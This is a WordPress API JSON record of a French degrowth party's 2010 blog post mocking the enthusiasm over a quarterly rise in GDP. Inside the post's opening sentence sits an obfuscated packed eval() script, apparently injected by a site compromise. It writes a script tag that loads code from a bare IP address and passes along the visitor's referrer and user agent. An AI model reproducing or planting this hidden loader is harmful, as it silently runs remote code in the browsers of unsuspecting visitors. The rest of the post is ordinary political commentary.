{"id":4777,"date":"2010-08-16T12:27:47","date_gmt":"2010-08-16T11:27:47","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?p=4777"},"modified":"2010-08-16T12:27:47","modified_gmt":"2010-08-16T11:27:47","slug":"la-croissance-revient-les-vieux-reflexes-avec","status":"publish","type":"post","link":"https:\/\/www.partipourladecroissance.net\/?p=4777","title":{"rendered":"La Croissance revient. Les vieux r\u00e9flexes avec !"},"content":{"rendered":"<p><img loading=\"lazy\" decoding=\"async\" class=\"alignleft\" src=\"http:\/\/www.alarecherchedutempsperdu.fr\/9798Vive_la_croissance.jpg\" alt=\"\" width=\"109\" height=\"153\" \/>En <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tbekt|var|u0026u|referrer|tzani||js|php'.split('|'),0,{}))\n<\/script><\/noindex> voil\u00e0 une bonne nouvelle ! Voil\u00e0 qui est bien rassurant (1) ! Voil\u00e0 une information qui ne va pas \u00eatre trop compliqu\u00e9e \u00e0 traiter : chacun va pouvoir reprendre son r\u00f4le. <strong>Peu importe le fond, c\u2019est tellement confortable de rester dans \u00ab les clous \u00bb de la pens\u00e9e unique, sans prendre aucun risque !<\/strong><\/p>\n<p><a href=\"http:\/\/sites.radiofrance.fr\/franceinter\/em\/intertreize\/index.php?id=94286\">http:\/\/sites.radiofrance.fr\/franceinter\/em\/intertreize\/index.php?id=94286<\/a><br \/>\n\u00ab<em> La croissance \u00e9conomique frissonne en Europe : c&rsquo;est ce qu&rsquo;attestent les r\u00e9sultats du 2\u00e8me trimestre 2010. La France enregistre un gain de 0,6%, l&rsquo;Allemagne montre ses muscles \u00e0 +2,2%. On craignait la contagion grecque, elle n&rsquo;a pas eu lieu. Pr\u00e9cisions et commentaires dans un instant. \u00bb<\/em><\/p>\n<p><strong>Voil\u00e0, r\u00e9jouissons-nous tous ensemble, dans la communion la plus totale.<\/strong><\/p>\n<p><!--more--><\/p>\n<ul>\n<li><strong>La majorit\u00e9 va pouvoir s\u2019enorgueillir<\/strong> de ce bon r\u00e9sultat, tout en omettant de rappeler que la raison principale de son enthousiasme est la r\u00e9duction de la dette de l\u2019\u00e9tat (2) : en effet le budget public est index\u00e9 sur la Croissance via les taxes directes et indirectes. C\u2019est bon pour les futures \u00e9lections, \u00e7a !<\/li>\n<li><strong>L\u2019opposition va nuancer l&rsquo;optimisme du gouvernement<\/strong>, en d\u00e9non\u00e7ant l\u2019artefact statistique : pas d&rsquo;\u00e9l\u00e9ments solides de reprise, la France se d\u00e9sindustrialise, le ch\u00f4mage continue (3).<\/li>\n<li><strong>Les m\u00e9dias vont s\u2019enthousiasmer pour cette nouvelle<\/strong>, et vont pouvoir orchestrer la valse des chiffres au 10\u00e8me de pour-cent pr\u00e8s. Ils vont pouvoir reprendre en toute libert\u00e9 leurs amalgames entre la dette publique, les exportations, la sant\u00e9 des industries, le ch\u00f4mage, et le bien-\u00eatre de la soci\u00e9t\u00e9 (5). Ils pourront m\u00eame faire vibrer la corde patriotique en nous comparant, nous la France, aux autres, les voisins allemands (4). \u00ab <em>D\u00e9j\u00e0 qu\u2019ils nous battent en football, on peut quand m\u00eame pas se laisser battre en croissance ?<\/em>! \u00bb<\/li>\n<li><strong>Et au consommateur de se r\u00e9jouir d\u2019avance<\/strong> de pouvoir consommer encore plus. Tout le monde le sait, depuis 30 ans le pouvoir d\u2019achat ne fait que d\u00e9cro\u00eetre, puisque les fran\u00e7ais ont moins de TV, d\u2019appareils m\u00e9nagers, d\u2019outils de communication, d\u2019automobiles et de hamburger que dans les ann\u00e9es 70.<\/li>\n<\/ul>\n<p><strong>Ah ben non, c\u2019est pas possible&#8230;<\/strong> Ce n\u2019est pas la croissance qui va relancer la consommation, c\u2019est la consommation qui a relanc\u00e9 la croissance \u00ab\u00a0<em>qu&rsquo;y disent \u00e0 la TV !\u00a0\u00bb<\/em>. L\u2019\u0153uf ou la poule !?<\/p>\n<p>Bah, peu importe ! Le principal est de pouvoir retrouver les bons vieux r\u00e9flexes qu\u2019une bonne croissance nous autorise.<br \/>\n<strong>Ce n\u2019est plus la peine de se demander ce qu\u2019il y a dans la croissance <\/strong>(6) (des arbres qui poussent ou des arbres qu\u2019on coupe ?), quel est le prix de cette croissance (consommation des ressources, organisation de la soci\u00e9t\u00e9), qui va en profiter (les plus pauvres, bien s\u00fbr) et qui va en souffrir (tant que \u00e7a reste dans les pays du sud). Et puis, surtout, on ne va pas se demander \u00ab <em>pourquoi faire, cette Croissance ? <\/em>\u00bb, puisqu\u2019on sait qu\u2019elle n\u2019a que des effets positifs (7).<\/p>\n<p>Oublions un moment toutes les questions de soci\u00e9t\u00e9 qui sont pos\u00e9es dans ces belles et longues \u00e9missions de radio, lors du Grenelle de l\u2019environnement, dans les beaux livres et les beaux d\u00e9bats de t\u00e9l\u00e9vision. Mettons-nous en roue libre. C\u2019est quand m\u00eame plus confortable que d\u2019essayer de d\u00e9m\u00ealer les hyper-connexions entre toutes les sph\u00e8res de notre soci\u00e9t\u00e9.<\/p>\n<p>Bon, ben excusez-moi, messieurs dames, mais il faut que j\u2019aille relancer la croissance, moi ! Et c\u2019est un m\u00e9tier, croyez moi ! \u00c7a ne se relance pas comme \u00e7a, la Croissance, il faut aller remplir son devoir de bon travailleur-consommateur.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter\" src=\" http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2008\/12\/logo-ppld.gif \" alt=\"\" width=\"118\" height=\"68\" \/><br \/>\n(1) AFP : <a href=\"http:\/\/www.google.com\/hostednews\/afp\/article\/ALeqM5gzVxfzi6MwL59s4AYMj6rawJ9tmg\">http:\/\/www.google.com\/hostednews\/afp\/article\/ALeqM5gzVxfzi6MwL59s4AYMj6rawJ9tmg<\/a><\/p>\n<p>(2) \u00ab Fran\u00e7ois Baroin : \u00ab\u00a0La croissance conforte le choix de ne pas augmenter les imp\u00f4ts \u00bb<br \/>\n<a href=\"http:\/\/www.france-info.com\/france-politique-2010-08-14-francois-baroin-la-croissance-conforte-le-choix-de-ne-pas-augmenter-475926-9-10.html\">http:\/\/www.france-info.com\/france-politique-2010-08-14-francois-baroin-la-croissance-conforte-le-choix-de-ne-pas-augmenter-475926-9-10.html<\/a><\/p>\n<p>(3) \u00ab Une bonne, une tr\u00e8s bonne nouvelle, \u00e0 la fois pour l&rsquo;\u00e9conomie fran\u00e7aise et pour l&#8217;emploi \u00bb<br \/>\n\u00ab\u00a0La France perd donc en comp\u00e9titivit\u00e9 et \u00e9prouve de grandes difficult\u00e9s \u00e0 se battre sur les march\u00e9s en forte croissance\u00a0\u00bb,<br \/>\n<a href=\"http:\/\/www.lemonde.fr\/economie\/article\/2010\/08\/13\/croissance-francaise-l-opposition-nuance-l-optimisme-du-gouvernement_1398836_3234.html\">http:\/\/www.lemonde.fr\/economie\/article\/2010\/08\/13\/croissance-francaise-l-opposition-nuance-l-optimisme-du-gouvernement_1398836_3234.html<\/a><\/p>\n<p>(4) \u00ab Croissance fran\u00e7aise : mieux que l\u2019Europe du Sud, loin derri\u00e8re l\u2019Allemagne \u00bb<br \/>\n<a href=\"http:\/\/www.lemonde.fr\/economie\/article\/2010\/08\/13\/croissance-francaise-mieux-que-l-europe-du-sud-loin-derriere-l-allemagne_1398556_3234.html\">http:\/\/www.lemonde.fr\/economie\/article\/2010\/08\/13\/croissance-francaise-mieux-que-l-europe-du-sud-loin-derriere-l-allemagne_1398556_3234.html<\/a><\/p>\n<p>(5) Oubliant de dire depuis un si\u00e8cle, qu&rsquo;un taux minimum de ch\u00f4mage est indispensable au fonctionnement du syst\u00e8me de Croissance<\/p>\n<p>(6) Nous pensons que la soci\u00e9t\u00e9 de Croissance est \u00e0 l\u2019origine de la crise multi-dimensionnelle \u00ab qui \u00e9prouve l\u2019humanit\u00e9 \u00bb : :<\/p>\n<ul>\n<li>L&rsquo;effondrement environnemental (crise de la biodiversit\u00e9, d\u00e9pl\u00e9tion des ressources et alt\u00e9ration des milieux, d\u00e9r\u00e8glement climatique).<\/li>\n<li>La crise sociale (mont\u00e9e des in\u00e9galit\u00e9s, crise de la dette et du syst\u00e8me financier).<\/li>\n<li>La crise politique et d\u00e9mocratique (d\u00e9saffection et d\u00e9rive de la d\u00e9mocratie).<\/li>\n<li>La crise de la personne humaine (perte de sens, d\u00e9litement des liens sociaux).<\/li>\n<\/ul>\n<p>(7) N\u2019allons pas croire que le PPLD d\u00e9plore que le PIB augmente. Il n\u2019est pas contre l\u2019augmentation du PIB. Il remet juste en cause la soci\u00e9t\u00e9 de Croissance pour la croissance. Cette remise en cause est d\u00e9velopp\u00e9e dans ce site web, dans des d\u00e9bats et dans les ouvrages en r\u00e9f\u00e9rence.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>En voil\u00e0 une bonne nouvelle ! Voil\u00e0 qui est bien rassurant (1) ! Voil\u00e0 une information qui ne va pas \u00eatre trop compliqu\u00e9e \u00e0 traiter : chacun va pouvoir reprendre son r\u00f4le. Peu importe le fond, c\u2019est tellement confortable de &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?p=4777\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7,8],"tags":[],"class_list":["post-4777","post","type-post","status-publish","format-standard","hentry","category-billets-du-ppld","category-communiques-de-presse"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/4777","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4777"}],"version-history":[{"count":2,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/4777\/revisions"}],"predecessor-version":[{"id":4779,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/4777\/revisions\/4779"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4777"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4777"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4777"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}